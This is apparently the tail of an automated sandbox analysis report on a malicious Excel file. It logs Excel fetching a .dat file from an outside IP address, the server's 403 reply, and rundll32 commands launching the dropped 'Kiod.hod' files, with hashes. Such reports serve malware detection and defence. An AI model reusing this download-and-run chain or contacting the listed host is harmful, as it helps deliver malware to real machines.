                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                1192.168.2.549719185.82.219.7580C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Apr 7, 2021 17:35:36.986771107 CEST1364OUTGET /44293.7328152778.dat HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 185.82.219.75
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Apr 7, 2021 17:35:37.204653025 CEST1365INHTTP/1.1 403 Forbidden
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Wed, 07 Apr 2021 15:35:37 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:17:35:10
                                                                                                                                                Start date:07/04/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0xa30000
                                                                                                                                                File size:27110184 bytes
                                                                                                                                                MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:17:35:36
                                                                                                                                                Start date:07/04/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:Rundll32 ..\Kiod.hod,DllRegisterServer
                                                                                                                                                Imagebase:0x9a0000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:17:35:37
                                                                                                                                                Start date:07/04/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:Rundll32 ..\Kiod.hod1,DllRegisterServer
                                                                                                                                                Imagebase:0x9a0000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:17:35:38
                                                                                                                                                Start date:07/04/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:Rundll32 ..\Kiod.hod2,DllRegisterServer
                                                                                                                                                Imagebase:0x9a0000
                                                                                                                                                File size:61952 bytes
                                                                                                                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >